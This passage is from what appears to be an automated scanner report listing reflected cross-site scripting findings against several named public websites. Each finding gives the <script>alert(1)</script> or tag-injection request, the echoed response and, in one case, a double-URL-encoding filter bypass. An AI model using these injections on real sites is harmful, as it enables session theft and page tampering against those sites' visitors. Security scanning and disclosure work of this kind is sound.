<frame NAME="top" SRC="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./6ea90"><script>alert(1)</script>789736ff2ae" NORESIZE>
...[SNIP]...

3.72. http://www.rzaz.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rzaz.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 39961<script>alert(1)</script>ce44caf0b5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status39961<script>alert(1)</script>ce44caf0b5c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:26 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 709

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS='100%, *' BORDER=0 FRAMEBORDER=no FRAMESPACING=0>
<frame SRC="http://searchportal.information.com/?o_
...[SNIP]...
</script>ce44caf0b5c">http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status39961<script>alert(1)</script>ce44caf0b5c</a>
...[SNIP]...

3.73. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rzaz.net
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfab7"><script>alert(1)</script>53d0cc9ed9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?bfab7"><script>alert(1)</script>53d0cc9ed9=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:12 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 780

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status?bfab7"><script>alert(1)</script>53d0cc9ed9=1" NORESIZE>
...[SNIP]...

3.74. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rzaz.net
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb39"><script>alert(1)</script>a7dfbcd982d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?8fb39"><script>alert(1)</script>a7dfbcd982d=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:11 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 783

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.inf
...[SNIP]...
<a HREF="http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status?8fb39"><script>alert(1)</script>a7dfbcd982d=1">
...[SNIP]...

3.75. http://www.rzaz.net/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rzaz.net
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f8089<script>alert(1)</script>e71378634fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?f8089<script>alert(1)</script>e71378634fe=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rzaz.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:00:12 GMT
Server: Apache/2.2.3 (CentOS)
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 777

<html>
<head>
<title>www.rzaz.net</title>
<meta name="keywords" content="">
</head>
<frameset ROWS="100%,*" BORDER="0" FRAMEBORDER="0" FRAMESPACING="0">
<frame NAME="top" SRC="http://searchportal.inf
...[SNIP]...
</script>e71378634fe=1">http://searchportal.information.com/?o_id=111662&domainname=www.rzaz.net./server-status?f8089<script>alert(1)</script>e71378634fe=1</a>
...[SNIP]...

3.76. http://www.simplejobing.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.simplejobing.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f8bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28ed646af4 was submitted in the REST URL parameter 1. This input was echoed as 6f8bb"><script>alert(1)</script>b28ed646af4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /server-status6f8bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb28ed646af4 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.simplejobing.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 02:47:41 GMT
ETag: "10ba8ef0312a2b717d43a9ab0693271f"
Server: Apache/2.2.11 (Ubuntu) Phusion_Passenger/3.0.2
Status: 200
Vary: Accept-Encoding
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.2
X-Runtime: 2876
Content-Length: 11196
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
<input name="query" id="query" value="server-status6f8bb"><script>alert(1)</script>b28ed646af4" type="text">
...[SNIP]...

3.77. http://www.smartertravel.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f426e<script>alert(1)</script>57a698dc0b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusf426e<script>alert(1)</script>57a698dc0b3 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:51 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=0dbb1d86f112f6e056dc3a76248e9464fb087e1166430178e53f44e399c3ed8964411164a27b51e4716f814f30def65998ed302362430ae96ca797fb29c8dca5; expires=Sun, 01-Apr-2012 02:21:51 GMT; path=/
Set-Cookie: vid=4d96883f33d629.84684801; path=/; domain=.smartertravel.com
Set-Cookie: uu=674a46b7-9450-4568-a96c-e2b6bc46278e; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:50 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/server-statusf426e<script>alert(1)</script>57a698dc0b3</p>
...[SNIP]...

3.78. http://www.tech-archive.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-archive.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 48428<a>f478f6185bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status48428<a>f478f6185bb HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:37 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6202

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a>f478f6185bb/">server-status48428<a>f478f6185bb</a>
...[SNIP]...

3.79. http://www.tech-archive.net/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-archive.net
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c56"><a>431af7671d9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status64c56"><a>431af7671d9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:31 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6206

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a href="http://www.tech-archive.net/server-status64c56"><a>431af7671d9/">
...[SNIP]...

3.80. http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-archive.net
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9e79f<a>e7ac0a7d6eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?9e79f<a>e7ac0a7d6eb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:07 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6208

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a>e7ac0a7d6eb=1/">server-status?9e79f<a>e7ac0a7d6eb=1</a>
...[SNIP]...

3.81. http://www.tech-archive.net/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-archive.net
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da0a"><a>eb69e724cdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?2da0a"><a>eb69e724cdb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-archive.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Sat, 02 Apr 2011 02:18:01 GMT
Last-Modified: Wed, 06 Jul 2005 17:51:31 GMT
Server: ApacheDK
Content-Type: text/html
Content-Length: 6212

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
<meta name="Author" content="Ulrich Keil">
<meta name="Publisher" content="Ulrich Keil">
<meta name="Copyright" content="Ul
...[SNIP]...
<a href="http://www.tech-archive.net/server-status?2da0a"><a>eb69e724cdb=1/">
...[SNIP]...

3.82. http://www.thenation.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thenation.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54b13"><script>alert(1)</script>c291b4b4d5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status54b13"><script>alert(1)</script>c291b4b4d5e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thenation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=600
Last-Modified: Sat, 02 Apr 2011 02:42:24 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301712144"
Content-Type: text/html; charset=utf-8
Content-Length: 19140
Date: Sat, 02 Apr 2011 02:42:24 GMT
X-Varnish: 2024713588
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:dc="http://purl.org/dc/elements/1.1
...[SNIP]...
<a href="/user?destination=server-status54b13"><script>alert(1)</script>c291b4b4d5e">
...[SNIP]...

3.83. http://www.thenation.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thenation.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6bc"><script>alert(1)</script>dff9df1199 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?2b6bc"><script>alert(1)</script>dff9df1199=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thenation.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: public, max-age=600
Last-Modified: Sat, 02 Apr 2011 02:41:56 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
ETag: "1301712116"
Content-Type: text/html; charset=utf-8
Content-Length: 19142
Date: Sat, 02 Apr 2011 02:41:58 GMT
X-Varnish: 2024713043
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:dc="http://purl.org/dc/elements/1.1
...[SNIP]...
<a href="/user?destination=server-status?2b6bc"><script>alert(1)</script>dff9df1199=1">
...[SNIP]...

3.84. http://www.theroot.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theroot.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95438"><script>alert(1)</script>2d6b1e727dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status95438"><script>alert(1)</script>2d6b1e727dd HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.theroot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Last-Modified: Sat, 02 Apr 2011 02:29:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 02 Apr 2011 02:29:07 GMT
Date: Sat, 02 Apr 2011 02:29:07 GMT
Content-Length: 15481
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/server-status95438"><script>alert(1)</script>2d6b1e727dd"/>
...[SNIP]...

3.85. http://www.thestar.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e77c'%3b1fb373810e was submitted in the REST URL parameter 1. This input was echoed as 9e77c';1fb373810e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status9e77c'%3b1fb373810e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thestar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 02:26:41 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-5
cache-control: public, max-age=300
Content-Length: 51644
Date: Sat, 02 Apr 2011 02:18:42 GMT
X-Varnish: 1959729312
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-2
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_server-status9e77c';1fb373810e_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

3.86. http://www.thestar.com/server-status [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thestar.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d90e7"><script>alert(1)</script>13396dbe4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-status?d90e7"><script>alert(1)</script>13396dbe4eb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thestar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 02:26:07 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-4
cache-control: public, max-age=300
Content-Length: 51064
Date: Sat, 02 Apr 2011 02:18:08 GMT
X-Varnish: 1959725248
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-2
X-Cache: MISS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a href="/app/Login?ReturnUrl=/server-status?d90e7"><script>alert(1)</script>13396dbe4eb=1" rel="nofollow">
...[SNIP]...

3.87. http://www.toledoblade.com/server-info [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toledoblade.com
Path:   /server-info

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 813be'%3b1c2ba0de953 was submitted in the REST URL parameter 1. This input was echoed as 813be';1c2ba0de953 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-info813be'%3b1c2ba0de953 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toledoblade.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 01:59:11 GMT
Last-Modified: Sat, 02 Apr 2011 01:54:11 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: Libercus AppServer v1.0.0401.3
X-Passed-To: BCW03 Libercus (2011-04-01T21:54:11.0717454-04:00)
X-Processed-By: BCW03 Libercus (2011-04-01T21:54:11.0717454-04:00)
X-Completed-By: BCW03 Libercus (2011-04-01T21:54:11.9311534-04:00)
Date: Sat, 02 Apr 2011 01:54:11 GMT
Content-Length: 24982
X-Cache: MISS from bcs01
X-Cache-Lookup: MISS from bcs01:80
Via: 1.0 bcs01 (squid/3.0.STABLE19)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> - Toledo Blade</title>
<met
...[SNIP]...
<SCR'+'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/tb2/SERVER-INFO813BE';1C2BA0DE953;pos=1;tile=1;dcopt=ist;adid=' + adid + ';sz=1x1;page=SECTION;ord=' + ord + '?">
...[SNIP]...

3.88. http://www.toledoblade.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.toledoblade.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14dce'%3bf63bcf83d7d was submitted in the REST URL parameter 1. This input was echoed as 14dce';f63bcf83d7d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status14dce'%3bf63bcf83d7d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.toledoblade.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 02 Apr 2011 02:31:31 GMT
Last-Modified: Sat, 02 Apr 2011 02:26:32 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: Libercus AppServer v1.0.0401.3
X-Passed-To: BCW04 Libercus (2011-04-01T22:26:31.8791182-04:00)
X-Processed-By: BCW04 Libercus (2011-04-01T22:26:31.8791182-04:00)
X-Completed-By: BCW04 Libercus (2011-04-01T22:26:32.8791502-04:00)
Date: Sat, 02 Apr 2011 02:26:32 GMT
Content-Length: 25094
X-Cache: MISS from bcs03
X-Cache-Lookup: MISS from bcs03:80
Via: 1.0 bcs03 (squid/3.0.STABLE19)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> - Toledo Blade</title>
<met
...[SNIP]...
<SCR'+'IPT LANGUAGE="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/tb2/SERVER-STATUS14DCE';F63BCF83D7D;pos=1;tile=1;dcopt=ist;adid=' + adid + ';sz=1x1;page=SECTION;ord=' + ord + '?">
...[SNIP]...

3.89. http://www.traderonline.com/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed2d7<script>alert(1)</script>f14f7490fd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statused2d7<script>alert(1)</script>f14f7490fd2 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.traderonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:50:01 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27592


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/server-statused2d7<script>alert(1)</script>f14f7490fd2</span>
...[SNIP]...

3.90. http://www.umd.edu/server-status [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.umd.edu
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload feb3b<script>alert(1)</script>00e7ed0c476 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server-statusfeb3b<script>alert(1)</script>00e7ed0c476 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.umd.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response


<html>
<head>
